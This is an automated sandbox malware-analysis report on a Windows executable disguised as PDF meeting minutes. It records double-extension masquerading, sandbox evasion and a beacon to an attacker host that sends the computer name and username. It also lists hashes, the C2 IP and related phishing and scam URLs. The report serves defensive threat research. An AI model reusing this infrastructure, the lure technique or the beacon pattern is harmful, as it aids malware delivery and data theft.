Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 64644Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 64519Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 64394Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 64269Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 64144Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 64019Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 63894Jump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeThread delayed: delay time: 63769Jump to behavior
Source: Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4108473106.0000000001286000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdfJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdfJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSCJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeQueries volume information: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeQueries volume information: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
DLL Side-Loading
11
Process Injection
2
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS22
System Information Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Timestomp
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431476 Sample: Minutes_of_15th_Session_of_... Startdate: 25/04/2024 Architecture: WINDOWS Score: 72 23 oraclewebonline.com 2->23 27 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->27 29 Multi AV Scanner detection for submitted file 2->29 31 Sigma detected: Suspicious Double Extension File Execution 2->31 33 2 other signatures 2->33 10 Minutes_of_15th_Session_of_PSC.pdf.exe 2->10         started        signatures3 process4 process5 12 cmd.exe 1 10->12         started        process6 14 Minutes_of_15th_Session_of_PSC.pdf.exe 15 2 12->14         started        17 conhost.exe 12->17         started        dnsIp7 25 oraclewebonline.com 188.241.39.200, 443, 49736, 49737 BANDWIDTH-ASGB Belize 14->25 19 cmd.exe 1 14->19         started        process8 process9 21 conhost.exe 19->21         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Minutes_of_15th_Session_of_PSC.pdf.exe8%ReversingLabs
Minutes_of_15th_Session_of_PSC.pdf.exe11%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
oraclewebonline.com0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://oraclewebonline.comd0%Avira URL Cloudsafe
http://oraclewebonline.com0%Avira URL Cloudsafe
https://oraclewebonline.com0%Avira URL Cloudsafe
https://oraclewebonline.com/log.php0%Avira URL Cloudsafe
https://oraclewebonline.com/log.php?computername=715575&username=usert0%Avira URL Cloudsafe
https://oraclewebonline.com/log.php?computername=715575&username=user0%Avira URL Cloudsafe
https://oraclewebonline.comD0%Avira URL Cloudsafe
https://oraclewebonline.com0%VirustotalBrowse
http://oraclewebonline.com0%VirustotalBrowse
https://oraclewebonline.com/log.php0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalseunknown
oraclewebonline.com
188.241.39.200
truefalseunknown
NameMaliciousAntivirus DetectionReputation
https://oraclewebonline.com/log.php?computername=715575&username=userfalse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://oraclewebonline.com/log.phpMinutes_of_15th_Session_of_PSC.pdf.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://oraclewebonline.com/log.php?computername=715575&username=usertMinutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003399000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000317C000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000323A000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://oraclewebonline.comMinutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032C9000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003399000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000323A000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://oraclewebonline.comMinutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000317C000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://oraclewebonline.comdMinutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032C9000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003399000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000323A000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMinutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000317C000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    https://oraclewebonline.comDMinutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032C9000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003399000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000317C000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    188.241.39.200
    oraclewebonline.comBelize
    25369BANDWIDTH-ASGBfalse
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1431476
    Start date and time:2024-04-25 09:20:04 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 30s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:11
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:Minutes_of_15th_Session_of_PSC.pdf.exe
    Detection:MAL
    Classification:mal72.evad.winEXE@9/0@1/1
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 62
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Override analysis time to 240000 for current running targets taking high CPU consumption
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 40.68.123.157, 20.3.187.198, 52.165.164.15
    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target Minutes_of_15th_Session_of_PSC.pdf.exe, PID 6464 because it is empty
    • Execution Graph export aborted for target Minutes_of_15th_Session_of_PSC.pdf.exe, PID 7048 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtReadVirtualMemory calls found.
    TimeTypeDescription
    09:20:52API Interceptor11963240x Sleep call for process: Minutes_of_15th_Session_of_PSC.pdf.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    188.241.39.200DOCUMENTS OF OWNERSHIP AND PAYMENT REQUIREMENTS.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
      DOCUMENTS OF OWNERSHIP AND PAYMENT REQUIREMENTS.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
        17110417865a2ccb6d9bd487608997be29b6460882d724bf7772ab8a69828a77e8d9a48878637.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
          PO1876.xlsGet hashmaliciousAgentTeslaBrowse
            VAN3065008.xlsGet hashmaliciousAgentTeslaBrowse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              bg.microsoft.map.fastly.netKMj8h32vWy.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
              • 199.232.214.172
              https://cos-aliyun8789.towqzg.cn/Get hashmaliciousUnknownBrowse
              • 199.232.210.172
              https://shining-melodic-magnesium.glitch.me/rvicendDev.htmlGet hashmaliciousUnknownBrowse
              • 199.232.210.172
              https://univ-paris13-4.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139Get hashmaliciousUnknownBrowse
              • 199.232.214.172
              https://univ-paris13.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139Get hashmaliciousUnknownBrowse
              • 199.232.210.172
              https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238Get hashmaliciousPhisherBrowse
              • 199.232.210.172
              https://windowdefalerts-error0x21702-alert-virus-detected.pages.dev/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
              • 199.232.210.172
              https://hkadsgfjadfkhkhdf.z19.web.core.windows.net/Er0Win8helpline76/index.htmlGet hashmaliciousUnknownBrowse
              • 199.232.214.172
              https://jiujiuwanka.cn/Get hashmaliciousUnknownBrowse
              • 199.232.214.172
              https://ppo46-secondary.z8.web.core.windows.net/werrx01USAHTML/?bcda=1-833-293-0124Get hashmaliciousTechSupportScamBrowse
              • 199.232.210.172
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              BANDWIDTH-ASGBDOCUMENTS OF OWNERSHIP AND PAYMENT REQUIREMENTS.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
              • 188.241.39.200
              suvyd.dll.dllGet hashmaliciousUnknownBrowse
              • 185.38.150.8
              suvyd.dll.dllGet hashmaliciousUnknownBrowse
              • 185.38.150.8
              crdss.exeGet hashmaliciousUnknownBrowse
              • 185.38.150.8
              file.exeGet hashmaliciousFormBookBrowse
              • 109.70.148.57
              202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 109.70.148.57
              https://zimtendernotices.co.zw/login.htmlGet hashmaliciousPayPal PhisherBrowse
              • 81.19.215.20
              DOCUMENTS OF OWNERSHIP AND PAYMENT REQUIREMENTS.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
              • 188.241.39.200
              file.exeGet hashmaliciousFormBookBrowse
              • 109.70.148.57
              POPN 04-0250-65-02-00-017.docx.docGet hashmaliciousUnknownBrowse
              • 109.70.148.35
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 188.241.39.200
              Database4.exeGet hashmaliciousUnknownBrowse
              • 188.241.39.200
              UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
              • 188.241.39.200
              Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
              • 188.241.39.200
              Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 188.241.39.200
              https://8fq7c.eceydri.com/WK9D/Get hashmaliciousHTMLPhisherBrowse
              • 188.241.39.200
              FW_ FHAS Inc_ - Private and Confidential.msgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
              • 188.241.39.200
              Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
              • 188.241.39.200
              SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exeGet hashmaliciousPureLog StealerBrowse
              • 188.241.39.200
              SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exeGet hashmaliciousPureLog StealerBrowse
              • 188.241.39.200
              No context
              No created / dropped files found
              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):3.9307230048517425
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              • Win32 Executable (generic) a (10002005/4) 49.78%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:Minutes_of_15th_Session_of_PSC.pdf.exe
              File size:78'848 bytes
              MD5:a51493ca2948491e60759223c3be8502
              SHA1:87c1d51cea91b80dd236b1f2ef12d78867ece1ca
              SHA256:dcdae583da8a1b01a8ad0caef6a7f6f3b6f1eb6dd3298ac7d904200f52712446
              SHA512:20907d14b70edd3885fd208b89c77169fd51059d398096cb1b05a6a134cfc051672b62e4cabe94e18c0b361b7b4ba547614899a258129cd835a1c93d93f53b13
              SSDEEP:384:PXAqmghAvFOY0enjV6ZilZq4KCm+ApH1ThO/FI:Pg0ypnjAZilZq4O+wX
              TLSH:6A73E8C5FA0095A4EC2E97312636DD721A137C7EA4B4292C3ECE3E7B3EBB4625411857
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z............"...0.. ..........N>... ...@....@.. ....................................`................................
              Icon Hash:d4a684988ca4a0c5
              Entrypoint:0x403e4e
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x9DB05A09 [Sat Nov 1 03:24:57 2053 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
              Instruction
              jmp dword ptr [00402000h]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x3dfc0x4f.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x10e58.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x3de00x1c.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x20000x1e540x2000efeab923a90dfd44b77c8bffc9cce6caFalse0.493408203125data5.413274813863478IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0x40000x10e580x1100092233e5b3996a64c164320e4bd34db09False0.08826401654411764data3.5017918271122985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x160000xc0x2003e25f8abea083d09bf30d39039006edcFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x41000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.07945403998580386
              RT_GROUP_ICON0x149380x14data1.15
              RT_VERSION0x1495c0x2fcdata0.43455497382198954
